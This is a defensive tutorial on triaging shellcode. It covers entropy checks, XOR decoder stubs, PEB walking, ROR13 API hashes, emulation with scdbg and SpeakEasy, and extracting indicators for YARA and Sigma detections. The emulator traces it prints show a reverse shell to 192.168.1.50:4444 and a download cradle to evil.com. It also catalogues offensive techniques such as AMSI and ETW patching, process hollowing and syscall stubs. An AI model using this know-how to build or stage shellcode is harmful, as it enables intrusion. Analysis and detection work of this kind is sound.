Shellcode Analysis: Tips, Tricks & Common Patterns
A practical guide to analyzing shellcode - identifying encoders, emulating execution, and recognizing common patterns. Covers triage, PEB walking, hash-based API resolution, scdbg/SpeakEasy emulation, and family-level pattern recognition.
Why Shellcode Analysis Matters
Most modern malware delivery is staged. The first thing that lands on the victim is rarely a full PE - it’s a small position-independent payload (shellcode) whose only job is to bootstrap whatever comes next: download a DLL, reflectively load a beacon, hollow a process, or stage credential theft. From a triage perspective, shellcode is where the campaign’s intent first appears. Decoding even 200 bytes of shellcode often reveals the actor’s tradecraft, the second-stage URL, and the choice of C2 framework before any expensive sandbox detonation.
This post collects the patterns I look for during shellcode triage, the tooling I reach for first, and the common shapes that recur across families.
Quick Triage
Check file entropy: roughly 4.5-6.5 suggests an encoded payload, 6.5-7.5 compression or weak encryption, and 7.5+ strong encryption. Disassemble with ndisasm for x86/x64.
First-Pass Tooling
# Entropy & file shape
ent shellcode.bin
binwalk -E shellcode.bin # entropy plot
binwalk shellcode.bin # bundled file scanner
# Disassembly
ndisasm -b 64 shellcode.bin | head
ndisasm -b 32 shellcode.bin | head
rasm2 -a x86 -b 64 -d -f shellcode.bin # radare2's disassembler
# Strings (post-decode)
strings -a -n 6 shellcode.bin
strings -el shellcode.bin # little-endian wide strings (UTF-16LE)
# Hash-based identification
sha256sum shellcode.bin
ssdeep shellcode.bin # fuzzy hashing for variant clustering
Entropy Heuristics
| Entropy | Interpretation |
|---|---|
| 0.0 - 1.5 | Mostly null bytes / fixed pattern - probably padding |
| 1.5 - 4.5 | Plain x86/x64 instructions - directly disassemblable |
| 4.5 - 6.5 | Encoded (XOR, alphanumeric, single-pass transform) |
| 6.5 - 7.5 | Compressed (LZ, RLE) or weakly encrypted |
| 7.5 - 8.0 | Strong encryption (AES, RC4 with random key) |
Whole-file entropy can mislead - the decoder stub at the start is plain code (low entropy) followed by an encrypted body (high entropy), and the average lands in the encoded range. Always look at windowed entropy (first 64 bytes vs. rest of the file).
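A minimal sketch of the windowed check, using only the standard library. The function names and the 64-byte default window are my own choices for illustration. Note that a 64-byte window can hold at most 64 distinct byte values, so its entropy tops out at 6.0 bits per byte; compare windows against each other rather than against the whole-file thresholds in the table.

```python
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte (0.0 for empty input)."""
    if not data:
        return 0.0
    total = len(data)
    # Sum p * log2(1/p) over the observed byte values.
    return sum((n / total) * math.log2(total / n) for n in Counter(data).values())

def windowed_entropy(data: bytes, window: int = 64, step: int = 64):
    """Yield (offset, entropy) for consecutive windows across the buffer."""
    for off in range(0, len(data), step):
        chunk = data[off:off + window]
        if chunk:
            yield off, shannon_entropy(chunk)

def stub_vs_body(data: bytes, split: int = 64):
    """Entropy of the first `split` bytes versus the rest of the buffer."""
    return shannon_entropy(data[:split]), shannon_entropy(data[split:])
```

A sharp jump between two adjacent windows is a reasonable first guess for where the decoder stub ends and the encoded body begins.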
Architecture Tells
Disassembling first as x64, then as x86, lets you eyeball which one looks like sane instructions:
- x64: lots of mov rax, ..., add rsp, ..., and 48 ... REX-prefixed bytes.
- x86: lots of mov eax, ... and push ebp; mov ebp, esp prologues.
- ARM64: STP X29, X30, [SP, ...] style prologues, no REX bytes.
If neither disassembly looks sensible, you’re looking at encoded data - find the decoder stub.
Common Patterns
Look for PEB walking (API resolution), hash-based function lookup (ROR13 for Metasploit), and XOR decoder stubs at the start.
XOR Decoder Stub
The simplest shellcode encoders prepend a 5-15 byte loop that walks the body byte by byte XORing with a fixed key, then jumps to the start of the decoded region. The pattern is unmistakable:
; 32-bit x86 encoding (in 64-bit mode the byte 0x46 is a REX prefix, not inc)
0000 EB 0D jmp short loc_F
0002 loc_2:
0002 5E pop esi ; esi = address of encoded body (0x14)
0003 31 C9 xor ecx, ecx
0005 B1 87 mov cl, 0x87 ; encoded length
0007 loc_7:
0007 80 36 AA xor byte ptr [esi], 0xAA ; XOR key
000A 46 inc esi
000B E2 FA loop loc_7
000D EB 05 jmp short loc_14
000F loc_F:
000F E8 EE FF FF FF call loc_2
0014 loc_14:
... encoded body ...
The “call/pop” trick is the position-independent way to learn the address of the encoded body. After the loop, control transfers into the decoded code. Once you spot the structure, the XOR key (0xAA here) and length (0x87) are static parameters - apply them in CyberChef or a 3-line Python script and disassemble the result.
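The short Python script mentioned above could look like the sketch below. It assumes the parameters read off the listing (key 0xAA, length 0x87, encoded body starting at file offset 0x14); the function name is hypothetical, and a real sample will have its own values.

```python
def xor_decode(blob: bytes, key: int, body_offset: int, length=None) -> bytes:
    """Undo a single-byte XOR over blob[body_offset : body_offset + length].

    With length=None everything after body_offset is decoded.
    """
    end = None if length is None else body_offset + length
    return bytes(b ^ key for b in blob[body_offset:end])
```

Typical use is `decoded = xor_decode(open("shellcode.bin", "rb").read(), key=0xAA, body_offset=0x14, length=0x87)`, after which the decoded bytes can be written out and disassembled on their own.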
Alphanumeric encoders (such as Metasploit’s x86/alpha_mixed) use multi-pass transforms that emit only printable ASCII bytes. They are characterised by long runs of [A-Za-z0-9], usually with a tiny constructor stub at the very beginning of the file.
PEB Walking (API Resolution)
Shellcode cannot import anything by name - there’s no PE loader to fix up imports. Instead, it walks the Process Environment Block to find loaded modules. The structure on x64:
GS:[0x60] → PEB
PEB.Ldr → PEB_LDR_DATA
PEB.Ldr.InMemoryOrderModuleList → linked list of LDR_DATA_TABLE_ENTRY
(one per loaded DLL)
LDR_DATA_TABLE_ENTRY:
+0x000 InLoadOrderLinks (LIST_ENTRY)
+0x010 InMemoryOrderLinks (LIST_ENTRY)
+0x020 InInitializationOrderLinks
+0x030 DllBase
+0x048 FullDllName (UNICODE_STRING)
+0x058 BaseDllName (UNICODE_STRING)
The recognisable assembly:
mov rdx, gs:[0x60] ; PEB
mov rdx, [rdx + 0x18] ; PEB.Ldr
mov rdx, [rdx + 0x20] ; InMemoryOrderModuleList head
; (next: walk LIST_ENTRY pointers, cmp BaseDllName)
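The x86 equivalent uses FS:[0x30] and offsets 0x0C (PEB.Ldr) and 0x14 (InMemoryOrderModuleList). Note that the list pointers address the InMemoryOrderLinks field rather than the start of the entry, so on x64 the walker reads DllBase at [entry + 0x20], not +0x30. Once you see FS:[0x30] or GS:[0x60] near the start of the code (or of the decoded body), you’re looking at PEB walking - that’s API resolution.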
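To find these accesses without a disassembler, a byte-level scan for a few common encodings of the FS:[0x30] and GS:[0x60] loads is usually enough. The sketch below is a heuristic under that assumption: it covers only the plain `mov` forms (absolute and register-plus-disp8), the function name is hypothetical, and both false positives and missed variants are possible.

```python
def find_peb_access(buf: bytes):
    """Return (offset, arch, form) for byte sequences that look like a PEB load."""
    hits = []
    for i in range(len(buf)):
        win = buf[i:i + 9]
        if win.startswith(b"\x64\xa1\x30\x00\x00\x00"):
            hits.append((i, "x86", "mov eax, fs:[0x30]"))
        elif win.startswith(b"\x64\x8b") and len(win) >= 4:
            mod, rm = win[2] >> 6, win[2] & 7
            if mod == 1 and rm != 4 and win[3] == 0x30:
                # FS prefix, mov r32, [r32 + disp8] with disp8 = 0x30
                hits.append((i, "x86", "mov r32, fs:[r32+0x30]"))
            elif mod == 0 and rm == 5 and win[3:7] == b"\x30\x00\x00\x00":
                # FS prefix, mov r32, [disp32] with disp32 = 0x30
                hits.append((i, "x86", "mov r32, fs:[0x30]"))
        elif (len(win) >= 5 and win[0] == 0x65
              and 0x48 <= win[1] <= 0x4F and win[2] == 0x8B):
            mod, rm = win[3] >> 6, win[3] & 7
            if mod == 1 and rm != 4 and win[4] == 0x60:
                # GS prefix, REX.W, mov r64, [r64 + disp8] with disp8 = 0x60
                hits.append((i, "x64", "mov r64, gs:[r64+0x60]"))
            elif mod == 0 and rm == 4 and win[4:9] == b"\x25\x60\x00\x00\x00":
                # GS prefix, REX.W, mov r64, [disp32] via SIB 0x25
                hits.append((i, "x64", "mov r64, gs:[0x60]"))
    return hits
```

A hit at a small offset in plain code, or at the start of a decoded body, is a good place to begin reading the API resolution routine.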
Hash-Based Function Lookup (ROR13)
After locating kernel32.dll’s base, the shellcode walks the export directory comparing API name hashes (not strings - hardcoded strings would be a YARA bonanza) against pre-computed constants.
The Metasploit block_api.asm family uses ROR-13:
mov edi, [esi + 0x20] ; export directory: AddressOfNames (RVA)
...
xor eax, eax ; eax = running hash
loop_byte:
movzx edx, byte ptr [esi] ; next byte of the export name
inc esi
ror eax, 13 ; rotate-right by 13
add eax, edx
test dl, dl ; terminator reached? (it is hashed too)
jnz loop_byte
hash_done:
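Recognisable hashes (block_api adds the hash of the module name to the hash of the function name, so each constant identifies a module!function pair):
| Hash | API |
|---|---|
| 0x0726774C | kernel32.dll!LoadLibraryA |
| 0x7802F749 | kernel32.dll!GetProcAddress |
| 0xE553A458 | kernel32.dll!VirtualAlloc |
| 0xE0DF0FEA | ws2_32.dll!WSASocketA |
| 0x006B8029 | ws2_32.dll!WSAStartup |
| 0x6174A599 | ws2_32.dll!connect |
| 0x863FCC79 | kernel32.dll!CreateProcessA |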
Searching the raw bytes for any of these 4-byte values (stored little-endian, so 0x0726774C appears as 4C 77 26 07) immediately tells you the shellcode’s planned API set. Other families use FNV-1a, djb2, or custom polynomial hashes - the principle is identical, just with different constants.
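The hashing and the constant search can both be sketched in a few lines of Python. This follows my understanding of the block_api scheme: the module name is uppercased, encoded as UTF-16LE with its terminator, and hashed; the function name is hashed as ASCII with its terminator; and the two results are added modulo 2^32. The helper names are hypothetical, and other families will need a different hash function.

```python
def ror32(value: int, bits: int) -> int:
    """Rotate a 32-bit value right by `bits`."""
    bits %= 32
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF

def ror13(data: bytes) -> int:
    """Rotate-then-add hash over every byte of `data`."""
    h = 0
    for b in data:
        h = (ror32(h, 13) + b) & 0xFFFFFFFF
    return h

def block_api_hash(module: str, function: str) -> int:
    """Combined module + function hash in the block_api style (assumed scheme)."""
    mod = (module.upper() + "\x00").encode("utf-16-le")
    fn = (function + "\x00").encode("ascii")
    return (ror13(mod) + ror13(fn)) & 0xFFFFFFFF

def find_hash_constants(buf: bytes, table: dict):
    """Return sorted (offset, name, hash) for each little-endian hash found in buf."""
    hits = []
    for name, h in table.items():
        needle = h.to_bytes(4, "little")
        off = buf.find(needle)
        while off != -1:
            hits.append((off, name, h))
            off = buf.find(needle, off + 1)
    return sorted(hits)

# Build a lookup table from names instead of hard-coding constants.
CANDIDATES = [("kernel32.dll", "LoadLibraryA"), ("kernel32.dll", "VirtualAlloc"),
              ("ws2_32.dll", "WSAStartup"), ("ws2_32.dll", "connect")]
TABLE = {f"{m}!{f}": block_api_hash(m, f) for m, f in CANDIDATES}
```

Generating the table from a list of export names scales better than memorising constants: dump the exports of the usual DLLs once, hash them all, and run `find_hash_constants` over every decoded sample.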
Egghunter / Tag-Search Shellcode
A 30-40 byte stub that scans process memory for a 4-byte tag repeated twice (e.g. w00t, giving the 8-byte egg w00tw00t) and jumps to whatever follows it. Used when the initial buffer is too small for the full payload but a larger buffer was placed elsewhere in the process. Recognisable by the NtAccessCheckAndAuditAlarm syscall, which Skape’s classic egghunter uses to check that a page is readable before touching it.
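Once the tag has been recovered from the hunter, the staged payload can be located in a memory dump the same way the hunter does it. The sketch below assumes the common convention of the 4-byte tag written twice back to back; the function name and the default tag are illustrative only.

```python
def find_egg_payload(memory: bytes, tag: bytes = b"w00t"):
    """Return the offset just past the doubled tag, or None if the egg is absent."""
    egg = tag * 2                      # the hunter looks for the tag twice in a row
    off = memory.find(egg)
    return None if off == -1 else off + len(egg)
```

The doubling matters: the hunter contains one copy of the tag in its own comparison, so searching for two consecutive copies keeps it from matching itself.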
Stack Strings
Even after API hashing, shellcode needs to push a few literal strings (e.g. URLs, registry keys). They show up as repeated mov dword ptr [rsp+...], 0xCONSTANT sequences building a string on the stack one DWORD at a time:
mov dword [rsp+0x00], 0x70747468 ; "http"
mov dword [rsp+0x04], 0x2F2F3A73 ; "s://"
...
Byte-swap each constant (the immediates are stored little-endian), concatenate them in order of increasing stack offset, and you have the raw string.
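As a small sketch of that reconstruction: `struct.pack("<I", ...)` does the byte swap, and joining the results in stack-offset order yields the string. The function name is hypothetical, and the input is assumed to be the DWORD immediates already pulled out of the disassembly in offset order.

```python
import struct

def decode_stack_string(dwords) -> str:
    """Rebuild a stack string from DWORD immediates listed in stack-offset order."""
    raw = b"".join(struct.pack("<I", d & 0xFFFFFFFF) for d in dwords)
    # Stop at the first NUL, which normally terminates the string.
    return raw.split(b"\x00", 1)[0].decode("ascii", errors="replace")

print(decode_stack_string([0x70747468, 0x2F2F3A73]))  # https://
```

For 64-bit stores (`mov rax, imm64` followed by a push or a `mov [rsp+...], rax`), the same idea applies with `"<Q"` in place of `"<I"`.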
Dynamic Analysis
Use scdbg to emulate execution and hook API calls - immediately reveals reverse shells, download cradles, and process injection.
scdbg
scdbg (David Zimmer) is the workhorse for x86 shellcode emulation:
scdbg /f shellcode.bin
# 401029 LoadLibraryA(WS2_32)
# 40103D WSAStartup(MAKEWORD(2,2),0x4011a0)
# 40104B WSASocketA(2,1,0,0,0,0)
# 401059 connect(192.168.1.50:4444) = -1 (no real network)
# 401067 CreateProcessA(cmd.exe)
# Stepcount 247
Within seconds you have the C2 host, port, and capability summary. Useful flags:
- /findsc to scan a buffer for likely shellcode entry points.
- /api to specify which API hooks to apply.
- /foff <hex> to start emulation from a specific offset (skip the decoder if you’ve already extracted the body).
scdbg is x86-only. For x64 use SpeakEasy (Mandiant), which emulates both.
SpeakEasy
speakeasy -t shellcode.bin -a x64 -r
# 0x10000000 VirtualAlloc(0, 0x1000, MEM_COMMIT, PAGE_EXECUTE_READWRITE) → 0x10001000
# 0x10000020 InternetOpenA("Mozilla/5.0...")
# 0x10000040 InternetConnectA("evil.com",443,...)
# 0x10000080 HttpOpenRequestA(GET, "/payload.bin")
# 0x100000a0 HttpSendRequestA(...)
SpeakEasy’s strengths are x64 support, a more complete Windows API surface, and a Python plugin model for extending coverage.
Unicorn / Qiling
For non-Windows shellcode (Linux, BSD) or for very custom analysis (replacing API stubs with your own logic), Unicorn and Qiling provide programmatic CPU emulation:
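from qiling import Qiling
from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE
# Raw shellcode is passed via code=, not as an executable path (assumes the Qiling 1.4+ API)
shellcode = open("shellcode.bin", "rb").read()
ql = Qiling(code=shellcode, rootfs="rootfs/x86_windows",
            archtype=QL_ARCH.X86, ostype=QL_OS.WINDOWS, verbose=QL_VERBOSE.DEBUG)
ql.run()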
Qiling layers OS emulation (Win32, POSIX) on top of Unicorn, so you can hook arbitrary instructions or addresses and dump memory at chosen points.
Live Debugger Approach
For complex shellcode that an emulator can’t handle (heavy SEH usage, syscalls, in-line mov cr3 style anti-emulation tricks):
- Compile a minimal loader.c that VirtualAllocs RWX memory, copies the shellcode in, and calls __debugbreak() just before jumping to it.
- Run the loader under x64dbg / WinDbg (or attach once it is waiting) and let it hit the breakpoint.
- Single-step through the shellcode in the real Windows environment.
This is slower than emulation but sidesteps anti-emulation tricks because you’re running on a real CPU with a real kernel. Anti-debugging checks, if present, still have to be handled separately.
Payload Pattern Catalogue
| Pattern | Indicator |
|---|---|
| Reverse shell | WSASocketA → connect → CreateProcessA |
| Download & exec | URLDownloadToFileA chain |
| Reflective DLL | VirtualAlloc → manual PE loading |
| Process injection | OpenProcess → VirtualAllocEx → WriteProcessMemory |
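Matching an emulator trace against these chains is an ordered-subsequence check, which the sketch below illustrates. The pattern names and API lists are copied from the table; the function names are hypothetical, and the Reflective DLL row is left out because manual PE loading is not a single API call that shows up in a trace.

```python
PATTERNS = {
    "Reverse shell": ["WSASocketA", "connect", "CreateProcessA"],
    "Download & exec": ["URLDownloadToFileA"],
    "Process injection": ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory"],
}

def is_subsequence(chain, trace) -> bool:
    """True if every API in `chain` appears in `trace` in the same order."""
    it = iter(trace)
    # `api in it` advances the iterator, so order is enforced.
    return all(api in it for api in chain)

def classify(trace):
    """Return the names of all patterns whose API chain occurs in the trace."""
    return [name for name, chain in PATTERNS.items() if is_subsequence(chain, trace)]
```

Given the API names from an emulator run, `classify(["LoadLibraryA", "WSAStartup", "WSASocketA", "connect", "CreateProcessA"])` returns `["Reverse shell"]`. Unrelated calls in between are tolerated, which suits noisy traces.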
Adding the most common families I see in 2025-2026 samples:
| Pattern | Recognisable API chain |
|---|---|
| Reverse TCP shell | WSAStartup → WSASocketA → connect → CreateProcessA(cmd.exe) with redirected STARTUPINFO |
| Bind shell | WSAStartup → bind → listen → accept → CreateProcessA |
| HTTP/S download cradle | LoadLibraryA(wininet) → InternetOpenA → InternetConnectA → HttpOpenRequestA → HttpSendRequestA → InternetReadFile |
| Reflective DLL loader | VirtualAlloc(RW) → custom loader walks PE → VirtualProtect(RX) → indirect call |
| Process hollowing | CreateProcessA(...,CREATE_SUSPENDED) → NtUnmapViewOfSection → VirtualAllocEx → WriteProcessMemory → SetThreadContext → ResumeThread |
| Process injection (classic) | OpenProcess → VirtualAllocEx → WriteProcessMemory → CreateRemoteThread |
| AMSI bypass shellcode | GetProcAddress(amsi.dll, AmsiScanBuffer) → VirtualProtect → patch entry to mov eax, 0x80070057; ret |
| ETW patch | GetProcAddress(ntdll, EtwEventWrite) → VirtualProtect → patch ret |
| Direct/indirect syscall stubs | mov rax, <SSN>; mov r10, rcx; syscall; ret (direct) or mov r11, <NtFunc+0x12>; call r11 (indirect) |
| Cobalt Strike stage 0 | RC4-decrypted body of ~256 KB; LoadLibraryA(wininet) + checksum 0xC691A8FB-style hashes |
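Direct syscall stubs are among the easiest rows in this table to find by byte pattern. The sketch below assumes the common ordering `mov r10, rcx; mov eax, <SSN>; syscall; ret` with a 32-bit immediate, which differs from the instruction order shown in the table, and accepts both encodings of `mov r10, rcx`. The function name is hypothetical, and stubs that pad, reorder, or split the sequence will not match.

```python
import re
import struct

_DIRECT_STUB = re.compile(
    rb"(?:\x4c\x8b\xd1|\x49\x89\xca)"  # mov r10, rcx (either encoding)
    rb"\xb8(.{4})"                      # mov eax, imm32 -> system service number
    rb"\x0f\x05"                        # syscall
    rb"\xc3",                           # ret
    re.DOTALL,
)

def find_direct_syscalls(buf: bytes):
    """Return (offset, ssn) for each direct-syscall stub found in buf."""
    return [(m.start(), struct.unpack("<I", m.group(1))[0])
            for m in _DIRECT_STUB.finditer(buf)]
```

The recovered numbers only map to Nt* function names for a specific Windows build, so record the SSN alongside the build you suspect the sample targets.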
A Quick Worked Example
A 312-byte sample lands on your desk. First-pass scdbg run:
scdbg /f sample.bin
401000 GetProcAddress(0x77E80000, "LoadLibraryA")
401016 GetProcAddress(0x77E80000, "GetProcAddress")
40102C LoadLibraryA(WININET)
401040 GetProcAddress(WININET, "InternetOpenA")
401055 GetProcAddress(WININET, "InternetConnectA")
40106A GetProcAddress(WININET, "HttpOpenRequestA")
401080 GetProcAddress(WININET, "HttpSendRequestA")
401096 GetProcAddress(WININET, "InternetReadFile")
4010A2 InternetOpenA("Mozilla/5.0 (Windows NT 10.0)")
4010BC InternetConnectA("evil.com", 443, NULL, NULL, INTERNET_SERVICE_HTTP)
4010D8 HttpOpenRequestA(hConnect, "GET", "/u.bin")
...
Triage verdict in under a minute: HTTPS download cradle pulling a second stage from evil.com:443/u.bin. That single URL becomes the next IOC; pivot in passive DNS / VirusTotal / URLScan to find the campaign perimeter.
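Pulling the URL out of a trace like the one above is easy to script. The sketch below assumes the line format shown in this example (quoted host and numeric port in InternetConnectA, quoted verb and path in HttpOpenRequestA), which is not a documented output contract of any emulator, and it guesses the scheme from the port. The function name is hypothetical.

```python
import re

_CONNECT = re.compile(r'InternetConnectA\("([^"]+)",\s*(\d+)')
_REQUEST = re.compile(r'HttpOpenRequestA\([^,]*,\s*"(\w+)",\s*"([^"]+)"')

def extract_urls(trace: str):
    """Pair each HttpOpenRequestA path with the most recent InternetConnectA host."""
    urls = []
    host = port = None
    for line in trace.splitlines():
        m = _CONNECT.search(line)
        if m:
            host, port = m.group(1), int(m.group(2))
            continue
        m = _REQUEST.search(line)
        if m and host is not None:
            scheme = "https" if port == 443 else "http"   # heuristic, not proof of TLS
            urls.append(f"{scheme}://{host}:{port}{m.group(2)}")
    return urls
```

Run over the trace above, this yields `https://evil.com:443/u.bin`, ready to feed into passive DNS or URL-reputation lookups.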
Practical Workflow Checklist
A repeatable triage that finishes most samples in 30 minutes:
- Hash + classify. SHA-256 → VT lookup → first-seen, family hits.
- Entropy + windowed entropy. Locate decoder vs body boundary.
- First instructions disassembly. PEB walk? Hash lookup? Decoder stub?
- Emulate (scdbg/SpeakEasy). Capture API trace.
- Decode + re-disassemble if there was a decoder stub.
- Identify family / framework. Metasploit? Cobalt Strike? Sliver? Custom?
- Extract IOCs. URLs, hostnames, ports, mutex names, file paths.
- Author detections. YARA on invariant bytes (hash constants, decoder shape); Sigma on the host-side spawn pattern.
Shellcode is rarely the whole attack - it’s the bridge. But the bridge always reveals the destination. Spend 15 minutes on the shellcode and you’ll often save hours of sandbox-driven black-box analysis.